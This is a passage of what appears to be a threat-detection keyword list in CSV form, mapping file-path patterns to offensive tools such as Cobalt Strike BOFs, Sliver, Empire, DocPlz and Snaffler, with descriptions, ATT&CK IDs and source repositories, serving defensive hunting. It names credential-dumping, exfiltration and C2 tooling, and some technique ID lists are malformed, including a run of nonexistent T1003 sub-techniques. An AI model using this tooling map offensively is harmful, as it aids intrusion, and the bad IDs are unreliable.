+"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/sec-tools/litefuzz*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*/SeeYouCM-Thief*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*/self_delete.cna*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" +"*/SeManageVolumeExploit.git*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" +"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/server/common/stagers.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/servers/dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/servers/icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/servers/smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/serverscan/CobaltStrike*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/serverscan_Air*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/serverscan_pro*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/ServerScanForLinux/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/ServerScanForWindows/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/ServerScanForWindows/PE*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/ServiceMove-BOF/*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*/ServiceName:TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/sfp_openphish.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/sfp_spider.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/sh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/s-h-3-l-l/*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*/shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ShadowForgeC2*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*/ShadowSpray.git*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*/ShadowSpray/*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*/share/windows-resources/wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 